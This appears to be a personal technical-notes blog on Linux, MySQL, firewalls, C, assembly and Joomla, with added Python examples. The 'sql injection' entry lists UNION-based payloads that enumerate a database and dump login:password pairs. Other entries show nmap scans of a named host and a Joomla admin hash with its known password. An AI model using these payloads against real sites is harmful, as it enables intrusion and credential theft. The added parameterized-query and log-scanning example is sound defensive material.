29 December 2011

mysql inet_ntoa problem

In a certain MySQL version (5.1.41) the result of INET_NTOA is not displayed in string format but as an integer.
The data (the bits themselves) is correct, but because it is printed/displayed as a number it confuses users.

Solution:
use 'CAST ... AS CHAR' as below.

SELECT CAST( INET_NTOA( 1965180531 ) AS CHAR)
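The same conversion done in Python, as an added example that is not from the original post: INET_ATON/INET_NTOA are just a 32-bit big-endian pack and unpack, and a small normaliser copes with the column arriving as an integer (the bug above), as bytes, or as text. Function names and the sample value handling are my own; 1965180531 is the value used in the query above.

```python
import socket
import struct


def inet_aton_int(dotted: str) -> int:
    """Dotted-quad string -> 32-bit integer, as MySQL INET_ATON() does."""
    parts = dotted.split(".")
    if len(parts) != 4 or not all(p.isdigit() and 0 <= int(p) <= 255 for p in parts):
        raise ValueError(f"not an IPv4 dotted quad: {dotted!r}")
    return struct.unpack("!I", bytes(int(p) for p in parts))[0]


def inet_ntoa_str(value: int) -> str:
    """32-bit integer -> dotted-quad string, as MySQL INET_NTOA() does."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError(f"not a 32-bit unsigned value: {value!r}")
    return socket.inet_ntoa(struct.pack("!I", value))


def normalize_inet_ntoa_result(raw) -> str:
    """Make an INET_NTOA() column usable whatever the server/driver handed back.

    Depending on version the column arrives as str, as bytes (a binary string),
    or, as described in the post above, still as the integer.
    """
    if isinstance(raw, (bytes, bytearray)):
        raw = raw.decode("ascii")
    if isinstance(raw, int):
        return inet_ntoa_str(raw)
    if isinstance(raw, str):
        if raw.isdigit():            # the integer, but delivered as text
            return inet_ntoa_str(int(raw))
        inet_aton_int(raw)           # validate the dotted quad; raises on garbage
        return raw
    raise TypeError(f"unexpected column type: {type(raw).__name__}")


if __name__ == "__main__":
    print(normalize_inet_ntoa_result(1965180531))
    print(normalize_inet_ntoa_result(b"117.34.70.115"))
```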

transparency in gimp

how to make part of an image transparent.
1) create a new layer. 'Layer Fill Type' => Transparency
2) copy the image to the new layer.
3) Use the Eraser Tool and select the area to be made transparent

30 November 2011

linux boot only gets as far as grub


from the grub prompt, run the commands below:
set root=(hd0,1)
linux /boot/vmlinuz-2.6.38-8-generic root=/dev/sda1 ro
initrd /boot/initrd.img-2.6.38-8-generic
boot

then it boots. Once booted:

sudo grub-install /dev/sda
sudo update-grub

23 November 2011

iptables

rather complex compared with pf (BSD).

1) by default (filter table) the packet flow through the chains is as in the diagram below.

2) commands
iptables -F   ;# flush everything
iptables -P INPUT DROP -t filter   ;# default policy for INPUT is DROP in the filter table
iptables -L -t filter ;# list the rules in the filter table
iptables -t filter -A INPUT -s 192.168.117.57/32 -i eth0 -j ACCEPT ;# append to the INPUT chain of the filter table

iptables-save  > rules.txt ;# can be redirected to a file (for restore)
iptables-restore < rules.txt


example:
#!/bin/sh
iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD

iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#Permit DNS traffic (queries go out to port 53, replies come back from port 53)
iptables -A INPUT -p udp --sport 53 -j ACCEPT
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT

#Accept local-network return traffic for clients
iptables -A INPUT -m state -p tcp --dport 1024:65535 --state ESTABLISHED,RELATED -s 192.168.9.0/24 -j ACCEPT
iptables -A OUTPUT -m state -p tcp --dport 1024:65535 ! --state INVALID -d 192.168.9.0/24 -j ACCEPT

#Accept local (192.168.9.0/24) SSH traffic
iptables -A INPUT -m state -p tcp --dport 22 ! --state INVALID -s 192.168.9.0/24 -j ACCEPT
iptables -A OUTPUT -m state -p tcp --sport 22 --state ESTABLISHED,RELATED -d 192.168.9.0/24 -j ACCEPT

The way rules are read differs from pf: once a rule on a given line matches, the rules below it are not read any more. Same as 'quick' in pf.

3) nat
   iptables -t nat -A POSTROUTING -o <external-interface> -j MASQUERADE

4) port forwarding
   iptables -t nat -A PREROUTING -p tcp -i <external-interface> --dport <port-num> -j DNAT --to <int_ip>:<port>
example 1:
   iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 8080 -j DNAT --to 192.168.9.35:22
example 2:
   iptables -t nat -A PREROUTING -i eth0 -j DNAT -d 202.1.1.4 --to 192.168.1.1
  # any packet to 202.1.1.4 will be forwarded to 192.168.1.1 without anyone noticing (transparent)


5) iptables has 3 tables
  1. filter: has 3 chains
    1. FORWARD
    2. INPUT
    3. OUTPUT
  2. nat: has 3 chains
    1. PREROUTING
    2. POSTROUTING
    3. OUTPUT
  3. mangle (rarely used, can be ignored)
    1. PREROUTING
    2. POSTROUTING
    3. OUTPUT
    4. INPUT
    5. FORWARD
Refer to the diagram for more detail


22 November 2011

call (assembly)

call in assembly is equivalent to the following 2 operations:

call 0x00401000   => push EIP
                     mov EIP, 0x00401000

02 November 2011

pf firewall


PF (the firewall on OpenBSD)

pf reads all the rules from top to bottom. Rules read later (lower down) override the earlier ones.

example:

block in on em0
pass in on em0 from 10.0.1.0/24
explanation:
start with a default block. Then allow it if the packet originates from 10.0.1.0/24

block in on em0
block in quick on em0 from 10.0.1.34
pass in on em0 from 10.0.1.0/24
explanation:
because of 'quick' on line 2: if the packet's source is 10.0.1.34, drop the packet immediately; there is no need to check the rules below.
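Added example (not from the original post) that covers both the iptables note above and this pf note: a small rule evaluator with the two matching disciplines side by side. `evaluate_pf` implements "last match wins unless quick", `evaluate_iptables` implements "first matching terminating target wins, else the chain policy"; the rule sets are the pf examples above and an iptables-style pair built from the earlier `-A INPUT -s 192.168.117.57/32 -i eth0 -j ACCEPT`. The `Rule` class and function names are my own; only interface and source address are modelled.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional


@dataclass
class Rule:
    action: str                   # "pass"/"block" (pf) or "ACCEPT"/"DROP" (iptables)
    iface: Optional[str] = None   # None matches any interface
    src: Optional[str] = None     # CIDR or single address; None matches any source
    quick: bool = False           # pf 'quick': stop evaluating when this rule matches

    def matches(self, iface: str, src: str) -> bool:
        if self.iface is not None and self.iface != iface:
            return False
        if self.src is not None and ip_address(src) not in ip_network(self.src, strict=False):
            return False
        return True


def evaluate_pf(rules: List[Rule], iface: str, src: str, default: str = "pass") -> str:
    """pf: every rule is read; the last matching one sets the verdict,
    unless a matching rule carries 'quick', which ends evaluation there."""
    verdict = default
    for r in rules:
        if r.matches(iface, src):
            verdict = r.action
            if r.quick:
                break
    return verdict


def evaluate_iptables(rules: List[Rule], iface: str, src: str, policy: str = "DROP") -> str:
    """iptables: the first matching rule with a terminating target decides;
    the chain policy applies when nothing matches (non-terminating targets
    such as LOG are not modelled here)."""
    for r in rules:
        if r.matches(iface, src):
            return r.action
    return policy


# The pf rule sets from the post above.
PF_SIMPLE = [
    Rule("block", iface="em0"),
    Rule("pass", iface="em0", src="10.0.1.0/24"),
]
PF_QUICK = [
    Rule("block", iface="em0"),
    Rule("block", iface="em0", src="10.0.1.34", quick=True),
    Rule("pass", iface="em0", src="10.0.1.0/24"),
]
# iptables-style: the earlier ACCEPT rule, policy DROP.
IPT_INPUT = [Rule("ACCEPT", iface="eth0", src="192.168.117.57/32")]
# Order matters in iptables: a specific DROP must come before the broader ACCEPT.
IPT_ORDERED = [
    Rule("DROP", iface="eth0", src="10.0.1.34"),
    Rule("ACCEPT", iface="eth0", src="10.0.1.0/24"),
]

if __name__ == "__main__":
    print(evaluate_pf(PF_SIMPLE, "em0", "10.0.1.5"))
    print(evaluate_pf(PF_QUICK, "em0", "10.0.1.34"))
    print(evaluate_iptables(IPT_ORDERED, "eth0", "10.0.1.34"))
    print(evaluate_iptables(list(reversed(IPT_ORDERED)), "eth0", "10.0.1.34"))
```

The last two calls show the practical difference: in iptables the same two rules give opposite results depending on their order, whereas in pf the specific rule would have to come last (or carry `quick`) to win.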




ref:http://openbsd.com/faq/pf/filter.html#pass

19 October 2011

sql injection

1) to determine the number of fields
order by 6-- >> the page still comes out normal
order by 7-- >> the page is no longer normal

2) to find out which field is displayed
union select 1,2,3,4,5,6--   >> '5' comes out

3) to get the version
union select 1,2,3,4,version(),6--

4) get the list of tables
union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=[databasename]

5) get the list of field names
union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name=[tablename]

6) get specific information
union select 1,2,3,4,concat_ws(0x3a,login,password),6 from users
output>> login:password
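The defender's side of the note above, as an added Python example that is not from the original post: the same lookup written with string concatenation and with a bound parameter, run against a constructed sqlite3 `users` table, plus a log scanner that flags the enumeration steps listed above (ORDER BY probing, UNION SELECT, information_schema, group_concat/concat_ws) in URL-encoded request lines. Table contents, the log lines and all function names are constructed for the example.

```python
import re
import sqlite3
from typing import List, Tuple
from urllib.parse import unquote_plus


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the 'users' table the post reads from."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    con.executemany("INSERT INTO users (login, password) VALUES (?, ?)",
                    [("alice", "hash1"), ("bob", "hash2")])
    return con


def lookup_user_unsafe(con: sqlite3.Connection, login_param: str):
    """String concatenation: the parameter becomes part of the SQL text, so a quote
    closes the literal and whatever follows (UNION, ORDER BY, --) is parsed as SQL."""
    sql = "SELECT id, login FROM users WHERE login = '" + login_param + "'"
    return con.execute(sql).fetchall()


def lookup_user_safe(con: sqlite3.Connection, login_param: str):
    """Bound parameter: the value travels separately from the statement and is only
    ever compared as a literal, so the same payload simply matches no row."""
    return con.execute("SELECT id, login FROM users WHERE login = ?", (login_param,)).fetchall()


# Probe signatures corresponding to the enumeration steps in the note above.
SQLI_PROBES = [
    ("order_by_probe",     re.compile(r"\border\s+by\s+\d+\s*--", re.I)),
    ("union_select",       re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
    ("aggregation",        re.compile(r"\b(?:group_concat|concat_ws)\s*\(", re.I)),
]
REQUEST_TARGET = re.compile(r'"(?:GET|POST)\s+(\S+)')


def flag_sqli_probe(request_target: str) -> List[str]:
    """Names of the probe patterns present in a (URL-encoded) request target."""
    decoded = unquote_plus(request_target)
    return [name for name, pat in SQLI_PROBES if pat.search(decoded)]


def scan_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """(client address, probes found) for every access-log line carrying a probe."""
    out = []
    for line in lines:
        m = REQUEST_TARGET.search(line)
        if not m:
            continue
        probes = flag_sqli_probe(m.group(1))
        if probes:
            out.append((line.split()[0], probes))
    return out


# Constructed access-log lines in common log format (no real server was scraped).
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Oct/2011:10:01:02 +0800] "GET /news.php?id=5 HTTP/1.1" 200 1532',
    '10.0.0.9 - - [19/Oct/2011:10:01:09 +0800] "GET /news.php?id=5+order+by+7-- HTTP/1.1" 500 220',
    '10.0.0.9 - - [19/Oct/2011:10:01:15 +0800] "GET /news.php?id=-5+union+select+1,2,3,4,'
    'group_concat(table_name),6+from+information_schema.tables-- HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    con = make_db()
    payload = "x' UNION SELECT 1,2--"
    print(lookup_user_unsafe(con, payload))   # the injected row comes back
    print(lookup_user_safe(con, payload))     # nothing: the payload is just a string
    for client, probes in scan_log(SAMPLE_LOG):
        print(client, probes)
```

The signatures are a triage aid, not a control: the fix is the bound parameter, and the scanner is there to show which requests to look at when reviewing logs for the pattern the note describes.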

11 October 2011

windows route


route ADD 10.10.10.0 MASK 255.255.255.0 192.168.2.13

persistent across reboots
route -p ADD 10.10.10.0 MASK 255.255.255.0 192.168.2.13

03 October 2011

diff svn

diff -U 3 -H -d -r -N cronjob_lama/svn-commit.tmp cronjob/svn-commit.tmp

08 September 2011

resume an scp download

combination of rsync and ssh:

rsync --rsh='ssh' -av --progress --partial 10.0.0.12:/home/siperdana/fileDownload.tar.gz /path/to/lokasi/

Reduce Thunderbird's disk usage

Even after deleting emails, the size on the hard disk does not shrink. You need to run File -> Compact Folders.

Explanation: even though the email has been deleted, it has not yet been removed from the mailbox file, only hidden from the user. When compact folders runs, Thunderbird really deletes it from the file concerned.

thunderbird 3.1

18 August 2011

Guess an OS remotely

nmap -O -v siperdana.blog.com

Device type: WAP
Running: Linux 2.4.X
OS details: DD-WRT v23 (Linux 2.4.36)
Uptime guess: 32.007 days (since Sun Jul 17 11:13:34 2011)
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros


nmap -sT -p0 siperdana.blog.com

Starting Nmap 5.21 ( http://nmap.org ) at 2011-08-18 11:19 MYT
Nmap scan report for siperdana.com.my (74.51.218.240)
Host is up (0.28s latency).
rDNS record for 74.51.218.240: f0.76.344a.static.theplanet.com
Not shown: 967 closed ports
PORT     STATE    SERVICE
1/tcp    filtered tcpmux
3/tcp    filtered compressnet
4/tcp    filtered unknown
6/tcp    filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds



05 August 2011

Network tools

netstat -punat

lsof -i :80   ; check the port


nmap -sT -p 1-65535 10.0.0.1;  test ports 1 to 65535



scan a subnet
nmap -v -sP 192.168.1.0/24 |grep -B1 up

enigmail for thunderbird 3.1

link for the version compatible with thunderbird 3.1
http://enigmail.mozdev.org/download/download-static.php.html

enigmail 1.2 only suits thunderbird 5.0 and above

workstation 6.5.5 cannot compile on kernel 2.6.38 (natty)

1)
cd /usr/lib/vmware/modules/source
tar xf the following files (vmci.tar, vmmon.tar, vmnet.tar, vsock.tar)
make a backup of all the .tar files above.

2)
apply the following patch: http://communities.vmware.com/servlet/JiveServlet/download/1721070-60934/2.6.37.1-1.2_6.5.5.patch
re-compress the patched code into its respective .tar files.

3)
run: vmware-modconfig --console --install-all

ref:
http://communities.vmware.com/message/1721070#1721070

06 July 2011

/etc/network/interfaces

Additional directives in interfaces

# The loopback network interface
auto lo
auto eth0
iface lo inet loopback
iface eth0 inet static
address 192.168.0.14
netmask 255.255.255.0
broadcast 192.168.0.255
network 192.168.0.0
gateway 192.168.0.1
post-up iptables-restore < /etc/iptables.up.rules

auto eth1
iface eth1 inet static
address 10.0.1.190
netmask 255.255.255.0
broadcast 10.0.1.255
network 10.0.1.0
hwaddress ether 00:0c:29:13:db:26
up route add -net 10.0.110.0/24 gw 10.0.1.254

up route add -net 10.0.14.0/24 gw 10.0.1.254
up route add -net 22.30.3.0/24 gw 10.0.1.254

01 July 2011

gmail search

label:inbox label:unread after:2011/05/15 before:2011/06/29

>> search the inbox for unread mail dated between 15 May and 29 Jun 2011

24 June 2011

Samba

# smbclient -L 192.168.1.2 -U muridin
Enter muridin's password:

Domain=[BIOLOGY] OS=[Unix] Server=[Samba 2.2.2]

 Sharename      Type      Comment
 ---------      ----      -------
 public         Disk      Public Stuff
 classes        Disk      Course folders
 website        Disk      Biology Life Sciences website
 win2k          Disk      Windows 2000 installer
 off2k          Disk      Office 2000 installer
 msdata         Disk      Mass Spec Data
 IPC$           IPC       IPC Service (Squirrel Samba Server)
 ADMIN$         Disk      IPC Service (Squirrel Samba Server)
 gonzo          Printer   

#smbmount //10.0.0.1/sharename /mnt/localdir -o username=nama,rw

or 

sudo mount -t cifs //<vpsa_ip_address>/<export_share> /mnt/<local_share>

26 May 2011

openbsd network

openvpn

  • cd /etc/openvpn
  • openvpn client.conf


firewall:

  • pfctl -n -f /etc/pf.conf


network restart

  • sh /etc/netstart em1    (or)
  • sh /etc/netstart

ip alias
  • cat /etc/hostname.em1

default gw :   /etc/mygate

route
  • route show
  • route -n show
  • route -n show -inet
  • netstat -rn
route add:
  • route add -net 192.168.1.0/24 192.168.1.254


24 May 2011

crossover: cannot restore the Word window

[Manage Bottle]->[ControlPanel]->[WineConfiguration]->[LaunchedSelectedItems]->[Graphics]
Uncheck the options below:
  • Allow the window manager to decorate the windows
  • Allow the window manager to control the windows

19 May 2011

joomla model

1- The Joomla framework creates a model class with the same name as the view, and makes that model class available inside the view class.

In /com_sample/view/js/view.html.php
class SampleViewJs extends JView

In /com_sample/models/js.php
class SampleModelJs extends JModel

2- to call the model from inside the view

$model = &$this->getModel();
$greeting = $model->getGreeting();

16 May 2011

php code formatter

the previous articles were produced with the following php code:

<?php
// usage: php formatter.php file.php
$str = $argv[1];
// same as the backtick operator; escapeshellarg() keeps the path from being interpreted by the shell
$str = shell_exec("cat " . escapeshellarg($str));
highlight_string($str);
?>


joomla JController->execute()

<?php
class kelas {
    function papar($var1 = "lk") {
        echo "kod dalam function papar";
    }
    function execute($task) {
        $this->$task();   // variable method call: the string in $task names the method to run
    }
}
$objek = new kelas();
$objek->execute("papar");
?>
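What `$this->$task()` means for security, shown in Python as an added example that is not from the original post or from Joomla: a controller that dispatches on whatever string it is given will also run helpers that were never meant to be tasks, while an allow-list built from explicitly marked methods rejects everything else. Class and method names are my own; `papar` is kept from the snippet above.

```python
class UnsafeController:
    """Mirrors JController->execute(): the incoming string becomes the method name."""

    def papar(self):
        return "papar ran"

    def _drop_database(self):              # internal helper, never meant to be a task
        return "database dropped"

    def execute(self, task: str):
        return getattr(self, task)()       # any attribute name is reachable, helpers included


def task(fn):
    """Decorator marking a method as an externally callable task."""
    fn.is_task = True
    return fn


class SafeController:
    def __init__(self):
        # Allow-list built once from the methods that carry the @task marker.
        cls = type(self)
        self._tasks = {name: getattr(self, name) for name in dir(cls)
                       if getattr(getattr(cls, name), "is_task", False)}

    @task
    def papar(self):
        return "papar ran"

    def _drop_database(self):              # not decorated, so not dispatchable
        return "database dropped"

    def execute(self, task_name: str):
        handler = self._tasks.get(task_name)
        if handler is None:
            raise PermissionError(f"unknown task {task_name!r}")
        return handler()


if __name__ == "__main__":
    print(UnsafeController().execute("_drop_database"))   # reachable by name alone
    print(SafeController().execute("papar"))
    try:
        SafeController().execute("_drop_database")
    except PermissionError as e:
        print(e)
```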

11 May 2011

php variable scope

1) global
<?php
$a = 1;
$b = 2;

function cuba() {
    global $a;                               // bring the global $a into the function scope
    echo "\$a = $a  \$b = {$GLOBALS['b']}";  // or read any global through $GLOBALS
}
cuba();
?>

2) static
<?php
function init() {
    static $a = 0;   // initialised once; keeps its value between calls
    $a++;
    return $a;
}
init();
echo init();
?>

05 May 2011

svn propedit

ignoring file(s) in a dir
svn propedit svn:ignore dir/

>> in the vi editor that opens, edit the list of files to ignore, one file per line

ps: if you use svn propset instead, it overwrites the previous list.

svn ignore dir

svn propset svn:ignore '*' unwanted_dir/

1)
webcapt/tmp$ svn status
M sessions
? sessions/ruby_sess.20649250e5a2ebfa
? sessions/ruby_sess.34a7003c82eaa928
? sessions/ruby_sess.f8c127b41f2b56ba
? sessions/ruby_sess.a75f05bc662a38ac

2)
webcapt/tmp$ svn propset svn:ignore '*' sessions/
property 'svn:ignore' set on 'sessions'

3)
webcapt/tmp$ svn status
M sessions

4)
webcapt/tmp$ svn commit
"svn-commit.tmp" 4L, 87C written
Sending tmp/sessions
Committed revision 19.

5)
webcapt/tmp$ svn status
[[[no more {? sessions/ruby_sess.34a7003c82eaa928} ]]]

UUID

1)
$ ls /dev/disk/by-uuid/ -alh
total 0
drwxr-xr-x 2 root root 100 2011-05-05 10:15 .
drwxr-xr-x 5 root root 100 2011-05-05 10:15 ..
lrwxrwxrwx 1 root root 10 2011-05-05 10:15 185de63a-3239-494d-993d-25cac74231dd -> ../../sda2
lrwxrwxrwx 1 root root 10 2011-05-05 10:15 1ca70448-5191-43de-b9e0-3ce9dfa14703 -> ../../sda3
lrwxrwxrwx 1 root root 10 2011-05-05 10:15 4c63ea13-039b-4346-b726-0a0cf59ab86e -> ../../sdb1


2)
$sudo blkid
/dev/sda1: TYPE="swap"
/dev/sda2: UUID="185de63a-3239-494d-993d-25cac74231dd" SEC_TYPE="ext2" TYPE="ext3"
/dev/sda3: UUID="1ca70448-5191-43de-b9e0-3ce9dfa14703" SEC_TYPE="ext2" TYPE="ext3"
/dev/sdb1: UUID="4c63ea13-039b-4346-b726-0a0cf59ab86e" TYPE="ext3"


ref: http://ubuntuforums.org/showthread.php?t=1026957

04 May 2011

find and rm

find ./ -mtime +100 -exec rm -r {} \;

find files under ./ that are more than 100 days old, and delete them.
> +100 : 100 days and more
> -100 : less than 100 days
> 100 : exactly 100 days

other options:
-amin, -atime, -cmin, -ctime, -mmin, and -mtime

c (ctime) > file's status changed
a > accessed
m > file's data modified

time > days (24 hours)
min > minutes
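The +N / -N / N arithmetic, as an added Python example that is not from the original post: find(1) first converts the age to whole units (fractions of a day are discarded), then `+N` means strictly more than N units, `-N` fewer than N, and bare `N` exactly N. The file names and timestamps are constructed so the result is reproducible.

```python
DAY = 24 * 60 * 60


def age_units(mtime: float, unit_seconds: int, now: float) -> int:
    """find(1) measures age in whole units: a file 2 days 23 hours old is '2' days old."""
    return int((now - mtime) // unit_seconds)


def matches_spec(age: int, spec: str) -> bool:
    """Interpret find's numeric argument: +N (more than N), -N (less than N), N (exactly N)."""
    if spec.startswith("+"):
        return age > int(spec[1:])
    if spec.startswith("-"):
        return age < int(spec[1:])
    return age == int(spec)


def select_by_mtime(files: dict, spec: str, now: float, unit_seconds: int = DAY) -> list:
    """Names of the files whose mtime satisfies '-mtime spec' ('-mmin' with unit_seconds=60)."""
    return sorted(name for name, mtime in files.items()
                  if matches_spec(age_units(mtime, unit_seconds, now), spec))


# Constructed sample: mtimes relative to a fixed 'now'.
NOW = 1_325_000_000.0
SAMPLE = {
    "fresh.log":   NOW - 3 * DAY,
    "edge.log":    NOW - 100 * DAY - 3600,   # 100 days 1 hour -> age 100, so NOT matched by +100
    "old.log":     NOW - 101 * DAY,          # 101 full days -> age 101
    "ancient.log": NOW - 400 * DAY,
}

if __name__ == "__main__":
    for spec in ("+100", "-100", "100"):
        print(spec, select_by_mtime(SAMPLE, spec, NOW))
```

Running the same selection with `-print` before swapping in `-exec rm` is the check this model stands in for: `edge.log` is the kind of file that surprises people, because 100 days and one hour is still "100" to find and `+100` leaves it alone.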


ref:http://www.linuxquestions.org/questions/linux-newbie-8/delete-files-older-than-30-days-using-cronjob-333477/

redmine, webdav - svn

how webdav checks the permission to read svn

File: /usr/lib/perl5/Apache/Redmine.pm:

sub RedmineDSN {
    my ($self, $parms, $arg) = @_;
    $self->{RedmineDSN} = $arg;
    my $query = "SELECT
        hashed_password, auth_source_id, permissions
        FROM members, projects, users, roles
        WHERE
        projects.id=members.project_id
        AND users.id=members.user_id
        AND roles.id=members.role_id
        AND users.status=1
        AND login=?
        AND identifier=? ";
    $self->{RedmineQuery} = trim($query);
}

ps: the user must be added as a member of the project

ref:http://www.redmine.org/projects/redmine/wiki/Repositories_access_control_with_apache_mod_dav_svn_and_mod_perl

03 May 2011

NoMachine Fullscreen

CTRL+Alt+F  full screen


URL: http://www.nomachine.com/ar/view.php?ar_id=AR03C00172

01 May 2011

inline assembly

MinGW
#include <stdio.h>

/* 32-bit x86 only (gcc -m32 -O0). Returns ESP in EAX and writes the caller's
   return address (the saved EIP at [ebp+4]) through the pointer argument. */
int get_sp(int *eip)
{
    asm (
        "mov %esp, %eax\n"      /* EAX = current stack pointer (the return value) */
        "mov 4(%ebp), %ebx\n"   /* EBX = return address saved by CALL, i.e. the caller's EIP */
        "lea 8(%ebp), %ecx\n"   /* ECX = address of the first argument (eip) */
        "mov (%ecx), %ecx\n"    /* ECX = the pointer value passed in */
        "mov %ebx, (%ecx)\n"    /* *eip = return address */
    );
    /* EAX already holds the result; no C return statement on purpose. */
}
int main(void)
{
    int x = 5;
    asm("int3");                /* software breakpoint: stop here in the debugger */
    printf("StackPointer (ESP): 0x%x\n", get_sp(&x));
    printf("EIP: 0x%x\n", x);
    return 0;
}

cl (visual studio)
#include <stdio.h>

/* Same routine in MSVC inline-assembly syntax (32-bit build). */
int get_sp(int *eip)
{
    __asm {
        mov eax, esp        ; EAX = current stack pointer (the return value)
        mov ebx, [ebp+4]    ; EBX = return address saved by CALL
        lea ecx, [ebp+8]    ; ECX = address of the first argument (eip)
        mov ecx, [ecx]      ; ECX = the pointer value passed in
        mov [ecx], ebx      ; *eip = return address
    }
}
int main(void)
{
    int x = 5;
    __asm { int 3 };        /* software breakpoint */
    printf("StackPointer (ESP): 0x%x\n", get_sp(&x));
    printf("EIP: 0x%x\n", x);
    return 0;
}

29 April 2011

char array vs char pointer

#include <stdio.h>

int main(void)
{
    char j2[100] = "adam:Aku darah anak malaysia";
    char *j3;

    j3 = j2;    /* the array name decays to the address of its first element */
    printf("&j2=%p j2=%p\n", (void *)&j2, (void *)j2);
    /* %x on a 64-bit pointer is undefined behaviour; it is what truncated the
       value to 1b810fc0 in the output below. %p would print the whole address. */
    printf("&j3=%p  j3=%x\n", (void *)&j3, j3);
    return 0;
}

output:

&j2=0x7fff1b810fc0 j2=0x7fff1b810fc0
&j3=0x7fff1b810fb8  j3=1b810fc0

# compiled and run on a 64-bit OS.
&j2 is the same as j2 and j3.
&j3 is the location where the address of j2 is stored.

28 April 2011

string.h (c)

1) strcmp
int bil = strcmp(strA, strB);   /* both char *; returns 0 when the strings are identical */
if (bil == 0) {
    /* strA equals strB */
}

2) strstr
#include <stdio.h>
#include <string.h>

int main(void)
{
    char *s1 = "amanamanam";
    char *s2 = "ana";
    char *s3;

    s3 = strstr(s1, s2);    /* pointer to the first occurrence of s2 in s1, or NULL */
    if (s3 != NULL)
        printf("%p - %p = %f\n", (void *)s3, (void *)s1, (double)(s3 - s1));
    return 0;
}
>>>> 0x40085e - 0x40085c = 2.000000

26 April 2011

bit, byte, word

1 nibble = 4 bits
1 byte = 8 bits
1 word = 2 bytes = 16 bits
1 dword = 4 bytes = 32 bits

ps: each address in memory can hold 8 bits

retn

retn >> pop eip

retn 10 >> pop eip,
        >> add esp, 10h

Example:
1- Start as below.

Before RETN 14 (address 76E0BFA9), ESP = 001BFA18.
RET 14 >>
- POP EIP
- ADD ESP, 14

2- As a result, EIP and ESP change.
- POP EIP makes ESP become 001BFA1C.
- ADD ESP, 14 >>  ESP = 001BFA1C + 14 = 001BFA30
as below:

25 April 2011

jump if overflow

assembly:
jo > jump if overflow

But this is not a stack overflow. It refers to the overflow (O) flag in the CPU.
The flag is set when the result of the last arithmetic operation is too large to fit in the register.

[false alarm.]

mysql create user

GRANT ALL PRIVILEGES ON `dbName`.* TO 'mysqluser'@'localhost' WITH GRANT OPTION ;



Detail:
CREATE USER 'new-username'@'localhost' IDENTIFIED BY 'new-password';
GRANT ALL ON *.* TO 'new-username'@'localhost' WITH GRANT OPTION;



There is a list of privileges that you can grant to a user:

Privilege                 Meaning
------------------------  ----------------------------------------------------------------
ALL [PRIVILEGES]          Sets all simple privileges except GRANT OPTION
ALTER                     Enables use of ALTER TABLE
CREATE                    Enables use of CREATE TABLE
CREATE TEMPORARY TABLES   Enables use of CREATE TEMPORARY TABLE
DELETE                    Enables use of DELETE
DROP                      Enables use of DROP TABLE
EXECUTE                   Not implemented
FILE                      Enables use of SELECT ... INTO OUTFILE and LOAD DATA INFILE
INDEX                     Enables use of CREATE INDEX and DROP INDEX
INSERT                    Enables use of INSERT
LOCK TABLES               Enables use of LOCK TABLES on tables for which you have the SELECT privilege
PROCESS                   Enables the user to see all processes with SHOW PROCESSLIST
REFERENCES                Not implemented
RELOAD                    Enables use of FLUSH
REPLICATION CLIENT        Enables the user to ask where slave or master servers are
REPLICATION SLAVE         Needed for replication slaves (to read binary log events from the master)
SELECT                    Enables use of SELECT
SHOW DATABASES            SHOW DATABASES shows all databases
SHUTDOWN                  Enables use of mysqladmin shutdown
SUPER                     Enables use of CHANGE MASTER, KILL, PURGE MASTER LOGS, and SET GLOBAL statements
                          and the mysqladmin debug command; allows you to connect (once) even if
                          max_connections is reached
UPDATE                    Enables use of UPDATE
USAGE                     Synonym for "no privileges"
GRANT OPTION              Enables privileges to be granted


ref: http://stuntsnippets.com/mysql-create-new-user/

22 April 2011

pyHook

How to use pyHook in Immunity Debugger

1- Save the code below in the dir ~pathToImmunityDebugger\PyCommands\mhcubaHook.py
mhcubaHook.py

  • lines 17-18: the hook names must be different.

2- Open Immunity Debugger and File->Open any exe file.

3- Type !mhcubaHook and [enter] in the command box (at the bottom of I.D.). You will see the background colour at address 00401012 turn pink. This is because of the 'myhook.add(address)' call.

4- Press F9 (or Debug->Run)

5- Click the Window->Log menu to see the result

21 April 2011

recover deleted files

sudo dd if=/dev/mmcblk0p1 of=myCard.img bs=512

photorec myCard.img

ref: http://goinggnu.wordpress.com/2008/02/14/recover-deleted-files-from-memory-card/

20 April 2011

select into outfile


SELECT * INTO OUTFILE "/backup/books/allbooks.txt"
FIELDS TERMINATED BY '\t' LINES TERMINATED BY '\n'
FROM books;

ref:
http://www.mysqlfaqs.net/mysql-faqs/Data-Back-Up/Export-Data/How-to-use-SELECT-INTO-OUTFILE-statement-to-export-data

mysqldump without locking tables

mysqldump --lock-tables=false  -h komar.asia -u nama -ppassword database  > namaTable.sql

(a password given inline with -p is visible to other local users in the process list; omit the value to be prompted, or keep it in a credentials file read with --defaults-extra-file)

save an mms stream

http://forum.videohelp.com/threads/257045-How-to-record-streaming-WMV-ASF-MMS-links-using-VLC-Media-Player

18 April 2011

reset the joomla 1.6 admin password

replace the password field with:
 d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199

then log in using the password secret.

15 April 2011

codec library problem

suddenly the media player (vlc) no longer supports many formats. avidemux too: the formats it supports became fewer.

below is how to fix the problem.

---------------------------------------
I just solved my vlc video problems. It appears that the culprit was the getdeb repository that I had recently added. I commented out that repo and downgraded several packages - libavcodec-extra-52, libavdevice-extra-52 etc. The most important one seems to be libva1.

In case anyone needs detailed version information for some packages, I will be happy to post.


----------------------------
Open synaptic, search ffmpeg, and remove all installed ffmpeg libraries, starting with libavcodec* down to libswscale*

You'll lose some players and a plugin or 2, no matter, they can be reinstalled. (in synaptic, file -> history will show you
